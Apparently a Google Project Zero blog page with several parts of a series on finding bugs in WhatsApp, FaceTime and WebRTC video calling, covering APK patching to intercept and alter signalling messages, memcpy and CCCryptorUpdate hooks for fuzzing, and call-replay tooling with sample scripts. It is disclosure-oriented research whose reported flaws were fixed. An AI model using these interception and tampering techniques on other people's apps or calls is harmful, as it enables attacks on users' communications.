Project Zero

News and updates from the Project Zero team at Google

Adventures in Video Conferencing Part 4: What Didn't Work Out with WhatsApp

12 December 2018 - 19:54
Posted by Natalie Silvanovich, Project Zero
Not every attempt to find bugs is successful. When looking at WhatsApp, we spent a lot of time reviewing call signalling hoping to find a remote, interaction-less vulnerability. No such bugs were found. We are sharing our work with the hopes of saving other researchers the time it took to go down this very long road. Or maybe it will give others ideas for vulnerabilities we didn’t find.
As discussed in Part 1, signalling is the process through which video conferencing peers initiate a call. Usually, at least part of signalling occurs before the receiving peer answers the call. This means that if there is a vulnerability in the code that processes incoming signals before the call is answered, it does not require any user interaction.
WhatsApp implements signalling using a series of WhatsApp messages. Opening libwhatsapp.so in IDA, there are several native calls that handle incoming signalling messages.
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAck
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfo
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallRekeyRequest
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallFlowControl
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferReceipt
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallAcceptReceipt
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAccept
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferPreAccept
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChanged
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChangedAck
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferReject
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallTerminate
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallTransport
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallRelayLatency
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallRelayElection
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallInterrupted
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallMuted
Java_com_whatsapp_voipcalling_Voip_nativeHandleWebClientMessage
Using apktool to extract the WhatsApp APK, it appears these natives are called from a loop in the com.whatsapp.voipcalling.Voip class. Looking at the smali, it looks like signalling messages are sent as WhatsApp messages via the WhatsApp server, and this loop handles the incoming messages.
Immediately, I noticed that there was a peer-to-peer encrypted portion of the message (the rest of the message is only encrypted peer-to-server). I thought this had the highest potential for bugs, as the server would not be able to sanitize the data. In order to be able to read and alter encrypted packets, I set up a remote server with a python script that opens a socket. Whenever this socket receives data, the data is displayed on the screen, and I have the option of either sending the unaltered packet or altering the packet before it is sent. I then looked for the point in the WhatsApp smali where messages are peer-to-peer encrypted.
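A minimal sketch of this kind of interception server is shown below. The listening address, port and hex-based editing are placeholders rather than the actual script; the only requirement is that whatever bytes the server echoes back are the bytes the patched APK will substitute into the message.

import socket

HOST, PORT = "0.0.0.0", 9999  # hypothetical listen address and port

def serve():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen(1)
    while True:
        conn, addr = srv.accept()
        with conn:
            data = conn.recv(4096)
            if not data:
                continue
            print("from %s: %s" % (addr[0], data.hex()))
            # Type replacement bytes as hex, or press enter to forward unchanged.
            edited = input("hex to send back (blank = unchanged): ").strip()
            conn.sendall(bytes.fromhex(edited) if edited else data)

serve()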
Since WhatsApp uses libsignal for peer-to-peer encryption, I was able to find where messages are encrypted by matching log entries. I then added smali code that sends a packet with the bytes of the message to the server I set up, and then replaces it with the bytes the server returns (changing the size of the byte array if necessary). This allowed me to view and alter the peer-to-peer encrypted message. Making a call using this modified APK, I discovered that the peer-to-peer message was always exactly 24 bytes long, and appeared to be random. I suspected that this was the encryption key used by the call, and confirmed this by looking at the smali.
A single encryption key doesn’t have a lot of potential for malformed data to lead to bugs (I tried lengthening and shortening it to be safe, but got nothing but unexploitable null pointer issues), so I moved on to looking at the peer-to-server encrypted messages. Looking at the Voip loop in smali, it looked like the general flow is that the device receives an incoming message, it is deserialized and if it is of the right type, it is forwarded to the messaging loop. Then certain properties are read from the message, and it is forwarded to a processing function based on its type. Then the processing function reads even more properties, and calls one of the above native methods with the properties as its parameters. Most of these functions have more than 20 parameters.
Many of these functions perform logging when they are called, so by making a test call, I could figure out which functions get called before a call is picked up. It turns out that during a normal incoming call, the device only receives an offer and calls Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer, and then spawns the incoming call screen in WhatsApp. All the other signal types are not used until the call is picked up.
An immediate question I had was whether other signal types are processed if they are received before a call is picked up. Just because the initiating device never sends these signal types before the call is picked up doesn’t mean the receiving device wouldn’t process them if it received them.
Looking through the APK smali, I found the class com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback that has several methods like sendOffer and sendAccept that appeared to send the messages that are processed by these native calls. I changed sendOffer to call other send methods, like sendAccept, instead of its normal messaging functionality. Trying this, I discovered that the Voip loop will process any signal type regardless of whether the call has been answered. The native methods will then parse the parameters, process them and put the results in a buffer, and then call a single method to process the buffer. It is only at that point that processing stops if the message is of the wrong type.

I then reviewed all of the above methods in IDA. The code was very conservatively written, and most needed checks were performed. However, there were a few areas that potentially had bugs that I wanted to investigate more. I decided that changing the parameters to calls in com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback was too slow to test the number of cases I wanted to test, and went looking for another way to alter the messages.
Ideally, I wanted a way to pass peer-to-server encrypted messages to my server before they were sent, so I could view and alter them. I went through the WhatsApp APK smali looking for a point after serialization but before encryption where I could add my smali function that sends and alters the packets. This was fairly difficult and time consuming, and I eventually put my smali in every method that wrote to a non-file ByteArrayOutputStream in the com.whatsapp.protocol and com.whatsapp.messaging packages (about 10 total) and looked for where it got called. I figured out where it got called, and fixed the class so that anywhere a byte array was written out from a stream, it got sent to my server, and removed the other calls. (If you’re following along at home, the smali file I changed included the string “Double byte dictionary token out of range”, and the two methods I changed contained calls to toByteArray, and ended with invoking a protocol interface.) Looking at what got sent to my server, it seemed like a reasonably comprehensive collection of WhatsApp messages, and the signalling messages contained what I thought they would.
WhatsApp messages are in a compressed XMPP format. A lot of parsers have been written for reverse engineering this protocol, but I found the whatsapp-reveng parser worked the best. I did have to replace the tokens in whatsapp_defines.py with a list extracted from the APK for it to work correctly though. This made it easier to figure out what was in each packet sent to the server.
Playing with this a bit, I discovered that there are three types of checks in WhatsApp signalling messages. First, the server validates and modifies incoming signalling messages. Secondly, the messages are deserialized, and this can cause errors if the format is incorrect, and generally limits the contents of the Java message object that is passed on. Finally, the native methods perform checks on their parameters.
These additional checks prevented several of the areas I thought were problems from actually being problems. For example, there is a function called by Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer that takes in an array of byte arrays, an array of integers and an array of booleans. It uses these values to construct candidates for the call. It checks that the array of byte arrays and the array of integers are of the same length before it loops through them, using values from each, but it does not perform the same check on the boolean array. I thought that this could go out of bounds, but it turns out that the integers and booleans are serialized as a vector of <int,bool> pairs, and the arrays are then copied from the vector, so it is not actually possible to send arrays with different lengths.
One area of the signalling messages that looked especially concerning was the voip_options field of the message. This field is never sent from the sending device, but is added to the message by the server before it is forwarded to the receiving device. It is a buffer in JSON format that is processed by the receiving device and contains dozens of configuration parameters.
{"aec":{"offset":"0","mode":"2","echo_detector_mode":"4","echo_detector_impl":"2","ec_threshold":"50","ec_off_threshold":"40","disable_agc":"1","algorithm":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"aecm_adapt_step_size":"2"},"agc":{"mode":"0","limiterenable":"1","compressiongain":"9","targetlevel":"1"},"bwe":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"encode":{"complexity":"5","cbr":"0"},"init_bwe":{"use_local_probing_rx_bitrate":"1","test_flags":"982188032","max_tx_rott_based_bitrate":"128000","max_bytes":"8000","max_bitrate":"350000"},"ns":{"mode":"1"},"options":{"connecting_tone_desc": "test","video_codec_priority":"2","transport_stats_p2p_threshold":"0.5","spam_call_threshold_seconds":"55","mtu_size":"1200","media_pipeline_setup_wait_threshold_in_msec":"1500","low_battery_notify_threshold":"5","ip_config":"1","enc_fps_over_capture_fps_threshold":"1","enable_ssrc_demux":"1","enable_preaccept_received_update":"1","enable_periodical_aud_rr_processing":"1","enable_new_transport_stats":"1","enable_group_call":"1","enable_camera_abtest_texture_preview":"1","enable_audio_video_switch":"1","caller_end_call_threshold":"1500","call_start_delay":"1200","audio_encode_offload":"1","android_call_connected_toast":"1"}Sample voip_options (truncated)
If a peer could send a voip_options parameter to another peer, it would open up a lot of attack surface, including a JSON parser and the processing of these parameters. Since this parameter almost always appears in an offer, I tried modifying an offer to contain one, but the offer was rejected by the WhatsApp server with error 403. Looking at the binary, there were three other signal types in the incoming call flow that could accept a voip_options parameter. Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAccept and Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChanged were accepted by the server if a voip_options parameter was included, but it was stripped before the message was sent to the peer. However, if a voip_options parameter was attached to a Java_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfo message, it would be forwarded to the peer device. I confirmed this by sending malformed JSON and looking at the log of the receiving device for an error.
The voip_options parameter is processed by WhatsApp in three stages. First, the JSON is parsed into a tree. Then the tree is transformed to a map, so JSON object properties can be looked up efficiently even though there are dozens of them. Finally, WhatsApp goes through the map, looking for specific parameters and processes them, usually copying them to an area in memory where they will set a value relevant to the call being made.
Starting off with the JSON parser, it was clearly the PJSIP JSON parser. I compiled the code and fuzzed it, and only found one minor out-of-bounds read issue.
I then looked at the conversion of the JSON tree output from the parser into the map. The map is a very efficient structure. It is a hash map that uses FarmHash as its hashing algorithm, and it is designed so that the entire map is stored in a single slab of memory, even if the JSON objects are deeply nested. I looked at many open source projects that contained similar structures, but could not find one that looked similar. I looked through the creation of this structure in great detail, looking especially for type confusion bugs as well as errors when the memory slab is expanded, but did not find any issues.
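As an illustration of the general tree-to-map transformation only (WhatsApp's real structure is the slab-allocated, FarmHash-based map described above, not a Python dictionary), flattening a parsed JSON tree into a single lookup table can be sketched as:

import json

def flatten(node, prefix="", out=None):
    # Collapse a parsed JSON tree into a flat "path -> value" map so that
    # individual parameters can be looked up without re-walking the tree.
    if out is None:
        out = {}
    if isinstance(node, dict):
        for key, value in node.items():
            flatten(value, prefix + key + ".", out)
    else:
        out[prefix.rstrip(".")] = node
    return out

opts = flatten(json.loads('{"aec":{"mode":"2"},"ns":{"mode":"1"}}'))
print(opts["aec.mode"])   # prints: 2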
I also looked at the functions that go through the map and handle specific parameters. These functions are extremely long, and I suspect they are generated using a code generation tool such as bison. They mostly copy parameters into static areas of memory, at which point they become difficult to trace. I did not find any bugs in this area either. Other than going through parameter names and looking for values that seemed likely to cause problems, I did not do any analysis of how the values fetched from JSON are actually used. One parameter that seemed especially promising was an A/B test parameter called setup_video_stream_before_accept. I hoped that setting this would allow the device to accept RTP before the call is answered, which would make RTP bugs interaction-less, but I was unable to get this to work.
In the process of looking at this code, it became difficult to verify its functionality without the ability to debug it. Since WhatsApp ships an x86 library for Android, I wondered if it would be possible to run the JSON parser on Linux.
Tavis Ormandy created a tool that can load the libwhatsapp.so library on Linux and run native functions, so long as they do not have a dependency on the JVM. It works by patching the .dynamic ELF section to remove unnecessary dependencies, replacing DT_NEEDED tags with DT_DEBUG tags. We also needed to remove constructors and destructors by changing the DT_FINI_ARRAYSZ and DT_INIT_ARRAYSZ to zero. With these changes in place, we could load the library using dlopen() and use dlsym() and dlclose() as normal.
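A rough sketch of that patching idea for a 32-bit library is shown below. This is not Tavis's actual tool; it assumes pyelftools is available, rewrites every DT_NEEDED entry, and in practice you would leave alone the entries for libraries that do exist on Linux.

import struct
from elftools.elf.elffile import ELFFile

DT_NEEDED, DT_DEBUG = 1, 21
DT_INIT_ARRAYSZ, DT_FINI_ARRAYSZ = 27, 28

def patch_dynamic(path_in, path_out):
    data = bytearray(open(path_in, "rb").read())
    with open(path_in, "rb") as f:
        dyn = ELFFile(f).get_section_by_name(".dynamic")
        off, size = dyn["sh_offset"], dyn["sh_size"]
    for pos in range(off, off + size, 8):              # 8-byte Elf32_Dyn entries
        tag, val = struct.unpack_from("<iI", data, pos)
        if tag == DT_NEEDED:                           # drop the dependency
            struct.pack_into("<iI", data, pos, DT_DEBUG, val)
        elif tag in (DT_INIT_ARRAYSZ, DT_FINI_ARRAYSZ):
            struct.pack_into("<iI", data, pos, tag, 0) # skip ctors/dtors
    with open(path_out, "wb") as f:
        f.write(bytes(data))

patch_dynamic("libwhatsapp.so", "libwhatsapp-patched.so")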
Using this tool, I was able to look at the JSON parsing in more detail. I also set up distributed fuzzing of the JSON binary. Unfortunately, it did not uncover any bugs either.
Overall, WhatsApp signalling seemed like a promising attack surface, but we did not find any vulnerabilities in it. There were two areas where we were able to extend the attack surface beyond what is used in the basic call flow. First, it was possible to send signalling messages that should only be sent after a call is answered before the call is answered, and they were processed by the receiving device. Second, it was possible for a peer to send voip_options JSON to another device. WhatsApp could reduce the attack surface of signalling by removing these capabilities.
I made these suggestions to WhatsApp, and they responded that they were already aware of the first issue as well as variants of the second issue. They said they were in the process of limiting what signalling messages can be processed by the device before a call is answered. They had already fixed other issues where a peer can send voip_options JSON to another peer, and fixed the method I reported as well. They said they are also considering adding cryptographic signing to the voip_options parameter so a device can verify it came from the server to further avoid issues like this. We appreciate their quick resolution of the voip_options issue and strong interest in implementing defense-in-depth measures.
In Part 5, we will discuss the conclusions of our research and make recommendations for better securing video conferencing.

Adventures in Video Conferencing Part 3: The Even Wilder World of WhatsApp

11 December 2018 - 18:42
Posted by Natalie Silvanovich, Project Zero
WhatsApp is another application that supports video conferencing that does not use WebRTC as its core implementation. Instead, it uses PJSIP, which contains some WebRTC code, but also contains a substantial amount of other code, and predates the WebRTC project. I fuzzed this implementation to see if it had similar results to WebRTC and FaceTime.

Fuzzing Set-up

PJSIP is open source, so it was easy to identify the PJSIP code in the Android WhatsApp binary (libwhatsapp.so). Since PJSIP uses the open source library libsrtp, I started off by opening the binary in IDA and searching for the string srtp_protect, the name of the function libsrtp uses for encryption. This led to a log entry emitted by a function that looked like srtp_protect. There was only one function in the binary that called this function, and called memcpy soon before the call. Some log entries before the call contained the file name srtp_transport.c, which exists in the PJSIP repository. The log entries in the WhatsApp binary say that the function being called is transport_send_rtp2 and the PJSIP source only has a function called transport_send_rtp, but it looks similar to the function calling srtp_protect in WhatsApp, in that it has the same number of calls before and after the memcpy. Assuming that the code in WhatsApp is some variation of that code, the memcpy copies the entire unencrypted packet right before it is encrypted.
Hooking this memcpy seemed like a possible way to fuzz WhatsApp video calling. I started off by hooking memcpy for the entire app using a tool called Frida. This tool can easily hook native functions in Android applications, and I was able to see calls to memcpy from WhatsApp within minutes. Unfortunately though, video conferencing is very performance sensitive, and a delay sending video packets actually influences the contents of the next packet, so hooking every memcpy call didn’t seem practical. Instead, I decided to change the single memcpy to point to a function I wrote.
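As a rough sketch of this kind of hook driven from Frida's Python bindings (the process and module names are assumptions, and the real work targets one specific call site rather than every memcpy):

import frida

JS = """
Interceptor.attach(Module.getExportByName('libc.so', 'memcpy'), {
  onEnter(args) {
    send(args[2].toInt32());   // report each copy length to the Python side
  }
});
"""

device = frida.get_usb_device()
session = device.attach("com.whatsapp")          # assumes the app is running
script = session.create_script(JS)
script.on("message", lambda msg, data: print(msg))
script.load()
input("hooking memcpy; press enter to quit\n")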
I started off by writing a function in assembly that loaded a library from the filesystem using dlopen, retrieved a symbol by calling dlsym and then called into the library. Frida was very useful in debugging this, as it could hook calls to dlopen and dlsym to make sure they were being called correctly. I overwrote a function in the WhatsApp GIF transcoder with this function, as it is only used in sending text messages, which I didn’t plan to do with this altered version. I then set the memcpy call to point to this function instead of memcpy, using this online ARM branch finder.
sub_2F8CC
MOV             X21, X30
MOV             X22, X0
MOV             X23, X1
MOV             X20, X2
MOV             X1, #1
ADRP            X0, #aDataDataCom_wh@PAGE ; "/data/data/com.whatsapp/libn.so"
ADD             X0, X0, #aDataDataCom_wh@PAGEOFF ; "/data/data/com.whatsapp/libn.so"
BL              .dlopen
ADRP            X1, #aApthread@PAGE ; "apthread"
ADD             X1, X1, #aApthread@PAGEOFF ; "apthread"
BL              .dlsym
MOV             X8, X0
MOV             X0, X22
MOV             X1, X23
MOV             X2, X20
NOP
BLR             X8
MOV             X30, X21
RET

The library loading function
I then wrote a library for Android which had the same parameters as memcpy, but fuzzed and copied the buffer instead of just copying it, and put it on the filesystem where it would be loaded by dlopen. I then tried making a WhatsApp call with this setup. The video call looked like it was being fuzzed and crashed in roughly fifteen minutes.

Replay Set-up
To replay the packets I added logging to the library, so that each buffer that was altered would also be saved to a file. Then I created a second library that copied the logged packets into the buffer being copied instead of altering it. This required modifying the WhatsApp binary slightly, because the logged packet will usually not be the same size as the packet currently being sent. I changed the length of the hooked memcpy to be passed by reference instead of by value, and then had the library change the length to the length of the logged packet. This changed the value of the length so that it would be correct for the call to srtp_protect. Luckily, the buffer that the packet is copied into is a fixed length, so there is no concern that a valid packet will overflow the buffer length. This is a common design pattern in RTP processing that improves performance by reducing length checks. It was also helpful in modifying FaceTime to replay packets of varying length, as described in the previous post.
This initial replay setup did not work, and looking at the logged packets, it turned out that WhatsApp uses four streams with different SSRCs for video conferencing (possibly one for video, one for audio, one for synchronization and one for good luck). The streams each had only one payload type, and they were all different, so it was fairly easy to map each SSRC to its stream. So I modified the replay library to determine the current SSRC for each stream based on the payload types of incoming packets, and then to replace the SSRC of the replayed packets with the correct one based on their payload type. This reliably replayed a WhatsApp call. I was then able to fuzz and reproduce crashes on WhatsApp.

Results

Using this setup, I reported one heap corruption issue on WhatsApp, CVE-2018-6344. This issue has since been fixed. After this issue was resolved, fuzzing did not yield any additional crashes with security impact, and we moved on to other methodologies. Part 4 will describe our other (unsuccessful) attempts to find vulnerabilities in WhatsApp.

Adventures in Video Conferencing Part 2: Fun with FaceTime

5 December 2018 - 19:43
Posted by Natalie Silvanovich, Project Zero
FaceTime is Apple’s video conferencing application for iOS and Mac. It is closed source, and does not appear to use any third-party libraries for its core functionality. I wondered whether fuzzing the contents of FaceTime’s audio and video streams would lead to similar results to WebRTC.

Fuzzing Set-up
Philipp Hancke performed an excellent analysis of FaceTime’s architecture in 2015. It is similar to WebRTC, in that it exchanges signalling information in SDP format and then uses RTP for audio and video streams. Looking at the FaceTime implementation on a Mac, it seemed the bulk of the calling functionality of FaceTime is in a daemon called avconferenced. Opening the binary that supports its functionality, AVConference, in IDA, I found a function called SRTPEncryptData. This function then calls CCCryptorUpdate, which appeared to encrypt RTP packets below the header.
To do a quick test of whether fuzzing was likely to be effective, I hooked this function and altered the underlying encrypted data. Normally, this can be done by setting the DYLD_INSERT_LIBRARIES environment variable, but since avconferenced is a daemon that restarts automatically when it dies, there wasn’t an easy way to set an environment variable. I eventually used insert_dylib to alter the AVConference binary to load a library on startup, and restarted the process. The library loaded used DYLD_INTERPOSE to replace CCCryptorUpdate with a version that fuzzed every input buffer (using fuzzer q from Part 1) before it was processed. This implementation had a lot of problems: it fuzzed both encryption and decryption, it affected every call to CCCryptorUpdate from avconferenced, not just ones involved in SRTP and there was no way to reproduce a crash. But using the modified FaceTime to call an iPhone led to video output that looked corrupted, and the phone crashed in a few minutes. This confirmed that this function was indeed where FaceTime calls are encrypted, and that fuzzing was likely to find bugs.
I made a few changes to the function that hooked CCCryptorUpdate to attempt to solve these problems. I limited fuzzing the input buffer to the two threads that write audio and video output to RTP, which also solved the problem of decrypted packets being fuzzed, as these threads only ever encrypt. I then added functionality that wrote the encrypted, fuzzed contents of each packet to a series of log files, so that test cases could be replayed. This required altering the sandbox of avconferenced so that it could write files to the log location, and adding spinlocks to the hook, as calling CCCryptorUpdate is thread safe, but logging packets isn’t.

Call Replay
I then wrote a second library that hooks CCCryptorUpdate and replays packets logged by the first library by copying the logged packets in sequence into the packet buffers passed into the function. Unfortunately, this required a small modification to the AVConference binary, as the SRTPEncryptData function does not respect the length returned by CCCryptorUpdate; instead, it assumes that the length of the encrypted data is the same as the length of the plaintext data, which is reasonable when CCCryptorUpdate isn’t being hooked. Since SRTPEncryptData always uses a large fixed-size buffer for encryption, and encryption is in-place, I changed the function to retrieve the length of the encrypted buffer from the very end of the buffer, which was set in the hooked CCCryptorUpdate call. This memory is unlikely to be used for other purposes due to the typical shorter length of RTP packets. Unfortunately though, even though the same encrypted data was being replayed to the target, it wasn’t being processed correctly by the receiving device.
To understand why requires an explanation of how RTP works. An RTP packet has the following format.

It contains several fields that impact how its payload is interpreted. The SSRC is a random identifier that identifies a stream. For example, in FaceTime the audio and video streams have different SSRCs. SSRCs can also help differentiate between streams in a situation where a user could potentially have an unlimited number of streams, for example, multiple participants in a video call. RTP packets also have a payload type (PT in the diagram) which is used to differentiate different types of data in the payload. The payload type for a certain data type is consistent across calls. In FaceTime, the video stream has a single payload type for video data, but the audio stream has two payload types, likely one for audio data and the other for synchronization. The marker (M in the diagram) field of RTP is also used by FaceTime to represent when a packet is fragmented, and needs to be reassembled.
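For reference, the fixed part of the header can be pulled apart with a few lines of Python. This is only a sketch based on the standard RFC 3550 layout; any extensions, CSRCs and the payload follow after these 12 bytes.

import struct
from collections import namedtuple

RtpHeader = namedtuple(
    "RtpHeader",
    "version padding extension csrc_count marker payload_type sequence timestamp ssrc")

def parse_rtp_header(packet):
    # Fixed 12-byte RTP header (RFC 3550).
    b0, b1, seq, ts, ssrc = struct.unpack_from(">BBHII", packet, 0)
    return RtpHeader(
        version=b0 >> 6,
        padding=bool(b0 & 0x20),
        extension=bool(b0 & 0x10),
        csrc_count=b0 & 0x0F,
        marker=bool(b1 & 0x80),
        payload_type=b1 & 0x7F,
        sequence=seq,
        timestamp=ts,
        ssrc=ssrc,
    )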
From this it is clear that simply copying logged data into the current encrypted packet won’t function correctly, because the data needs to have the correct SSRC, payload type and marker, or it won’t be interpreted correctly. This wasn’t necessary in WebRTC, because I had enough control over WebRTC that I could create a connection with a single SSRC and payload type for fuzzing purposes. But there is no way to do this in FaceTime, even muting a video call leads to silent audio packets being sent as opposed to the audio stream shutting down. So these values needed to be manually corrected.
An RTP feature called extensions made correcting these fields difficult. An extension is an optional header that can be added to an RTP packet. Extensions are not supposed to depend on the RTP payload to be interpreted, and extensions are often used to transmit network or display features. Some examples of supported extensions include the orientation extension, which tells the endpoint the orientation of the receiving device and the mute extension, which tells the endpoint whether the receiving device is muted.
Extensions mean that even if it is possible to determine the payload type, marker and SSRC of data, this is not sufficient to replay the exact packet that was sent. Moreover, FaceTime creates extensions after the packet is encrypted, so it is not possible to create the complete RTP packet by hooking CCCryptorUpdate, because extensions could be added later.
At this point, it seemed necessary to hook sendmsg as well as CCCryptorUpdate. This would allow the outgoing RTP header to be modified once it is complete. There were a few challenges in doing this. To start, audio and video packets are sent by different threads in FaceTime, and can be reordered between the time they are encrypted and the time they are sent by sendmsg. So I couldn’t assume that an RTP packet received by sendmsg was necessarily the last one that was encrypted. There was also the problem that SSRCs are dynamic, so replaying an RTP packet with the same SSRC it is recorded with won’t work; it needs to have the new SSRC for the audio or video stream.
Note that in macOS Mojave, FaceTime can call sendmsg via either the AVConference binary or the IDSFoundation binary, depending on the network configuration. So to capture and replay unencrypted RTP traffic on newer systems, it is necessary to hook CCCryptorUpdate in AVConference and sendmsg in IDSFoundation (AVConference calls into IDSFoundation when it calls sendmsg). Otherwise, the process is the same as on older systems.
I ended up implementing a solution that records the unencrypted payload and its RTP header separately, and uses a snippet of the encrypted payload to pair each header with the correct unencrypted payload. Then, to replay packets, the packets encrypted in CCCryptorUpdate were replaced with the logged packets, and once the encrypted payload came through to sendmsg, the header was replaced with the logged one for that payload. Fortunately, the two streams with unique SSRCs used by FaceTime do not share any payload types, so it was possible to determine the new SSRC for each stream by waiting for an incoming packet with the correct payload type. Then in each subsequent packet, the SSRC was replaced with the correct one.
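A simplified sketch of that pairing and SSRC fix-up logic follows. The function names, the snippet length and the assumption of a plain 12-byte header are all illustrative, and the later re-encryption step is omitted.

import struct

SNIPPET_LEN = 16          # illustrative; enough ciphertext to be unique
HEADER_LEN = 12           # assumes no CSRCs before the payload

pending = {}              # ciphertext snippet -> (logged RTP header, plaintext)
live_ssrc = {}            # payload type -> SSRC observed on the live call

def on_encrypt(logged_header, plaintext, ciphertext):
    # Called from the CCCryptorUpdate hook: remember which logged header and
    # plaintext the outgoing ciphertext corresponds to.
    pending[bytes(ciphertext[:SNIPPET_LEN])] = (logged_header, bytes(plaintext))

def on_incoming(packet):
    # Learn the live SSRC for each payload type from packets we receive.
    live_ssrc[packet[1] & 0x7F] = struct.unpack_from(">I", packet, 8)[0]

def on_sendmsg(outgoing):
    # Called from the sendmsg hook: swap in the logged header/payload and
    # rewrite the SSRC for the stream this payload type belongs to.
    snippet = bytes(outgoing[HEADER_LEN:HEADER_LEN + SNIPPET_LEN])
    if snippet not in pending:
        return outgoing
    header, payload = pending.pop(snippet)
    rebuilt = bytearray(header + payload)
    pt = rebuilt[1] & 0x7F
    if pt in live_ssrc:
        struct.pack_into(">I", rebuilt, 8, live_ssrc[pt])
    return bytes(rebuilt)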
Unfortunately, this still did not replay a FaceTime call correctly, and calls often experienced decryption failures. I eventually determined that audio and video on FaceTime are encrypted with different keys, and updated the replay script to queue the CCCryptor used by the CCCryptorUpdate function based on whether it was audio or video content. Then in sendmsg, the entire logged RTP packet, including the unencrypted payload, was copied into the outgoing packet, the SSRC was fixed, and then the payload encrypted with the next CCCryptor out of the appropriate queue. If a CCCryptor wasn’t available, outgoing packets were dropped until a new one was created. At this point, it was possible to stop using the modified AVConference binary, as all the packet modification was now happening in sendmsg. This implementation still had reliability problems.
Digging more deeply into how FaceTime encryption works, packets are encrypted in CTR mode, which requires a counter. The counter is initialized to a unique value for each packet that is sent. During the initialization of the RTP stream, the peers exchange two 16-byte random tokens, one for audio and one for video. The counter value for each packet is then calculated by exclusive or-ing the token with several values found in the packet, including the SSRC and the sequence number. Only one value in this calculation, the sequence number, changes between each packet. So it is possible to calculate the counter value for each packet by knowing the initial counter value and sequence number, which can be retrieved by hooking CCCryptorCreateWithMode. The sequence number is xor-ed with the random token at index 0x12 when FaceTime constructs a counter, so by xor-ing this location with the initial sequence number and then a packet’s sequence number, the counter value for that packet can be calculated. The key can also be retrieved by hooking CCCryptorCreateWithMode.

This allowed me to dispense with queuing cryptors, as I now had all the information I needed to construct a cryptor for any packet. This allowed for packets to be encrypted faster and more accurately.
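A sketch of that counter reconstruction is below. The offset 0x12 comes from the description above; treating the sequence number as a 16-bit big-endian field, and the captured counter buffer as long enough to contain that offset, are assumptions.

SEQ_OFFSET = 0x12   # where the sequence number is xor-ed into the counter

def counter_for_packet(initial_counter, initial_seq, packet_seq):
    # XOR out the sequence number the counter was captured with, then XOR in
    # the current packet's sequence number.
    ctr = bytearray(initial_counter)
    delta = (initial_seq ^ packet_seq) & 0xFFFF
    ctr[SEQ_OFFSET] ^= (delta >> 8) & 0xFF
    ctr[SEQ_OFFSET + 1] ^= delta & 0xFF
    return bytes(ctr)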
Sequence numbers still posed a problem though, as the initial sequence number of an RTP stream is randomly generated at the beginning of the call, and is different between subsequent calls. Also, sequence numbers are used to reconstruct video streams in order, so they need to be correct. I altered the replay tool to determine the starting sequence number of each live stream, calculate each logged packet’s offset from the start of its logged stream, and add that offset to the live stream’s starting sequence number. These two changes finally made the replay tool work, though replay gets slower and slower as a stream is replayed due to dropped packets.
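The rebasing itself is just an offset into the live stream's numbering, keeping RTP's 16-bit wraparound (a sketch):

def rebase_seq(logged_seq, logged_stream_start, live_stream_start):
    # Shift a logged sequence number into the live stream's numbering space.
    return (live_stream_start + (logged_seq - logged_stream_start)) & 0xFFFF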
Results
Using this setup, I was able to fuzz FaceTime calls and reproduce the crashes. I reported three bugs in FaceTime based on this work. All these issues have been fixed in recent updates.
CVE-2018-4366 is an out-of-bounds read in video processing that occurs on Macs only.
CVE-2018-4367 is a stack corruption vulnerability that affects iOS and Mac. There are a fair number of variables on the stack of the affected function before the stack cookie, and several fuzz crashes due to this issue caused segmentation faults as opposed to stack_chk crashes, so it is likely exploitable.
CVE-2018-4384 is a kernel heap corruption issue in video processing that affects iOS. It is likely similar to this vulnerability found by Adam Donenfeld of Zimperium.
All of these issues took less than 15 minutes of fuzzing to find on a live device. Unfortunately, this was the limit of fuzzing that could be performed on FaceTime: because it is closed source, it would be difficult to create a command line fuzzing tool with coverage like we did for WebRTC.
In Part 3, we will look at video calling in WhatsApp.

Adventures in Video Conferencing Part 1: The Wild World of WebRTC

4 December 2018 - 20:40
Posted by Natalie Silvanovich, Project Zero
Over the past five years, video conferencing support in websites and applications has exploded. Facebook, WhatsApp, FaceTime and Signal are just a few of the many ways that users can make audio and video calls across networks. While a lot of research has been done into the cryptographic and privacy properties of video conferencing, there is limited information available about the attack surface of these platforms and their susceptibility to vulnerabilities. We reviewed the three most widely-used video conferencing implementations. In this series of blog posts, we describe what we found.
This part will discuss our analysis of WebRTC. Part 2 will cover our analysis of FaceTime. Part 3 will discuss how we fuzzed WhatsApp. Part 4 will describe some attacks against WhatsApp that didn’t work out. And finally, Part 5 will discuss the future of video conferencing and steps that developers can take to improve the security of their implementation.

Typical Video Conferencing Architecture
All the video conferencing implementations we investigated allow at least two peers anywhere on the Internet to communicate through audiovisual streams. Implementing this capability so that it is reliable and has good audio and video quality presents several challenges. First, the peers need to be able to find each other and establish a connection regardless of NATs or other network infrastructure. Then they need to be able to communicate, even though they could be on different platforms, application versions or browsers. Finally, they need to maintain audio and video quality, even if the connection is low-bandwidth or noisy.
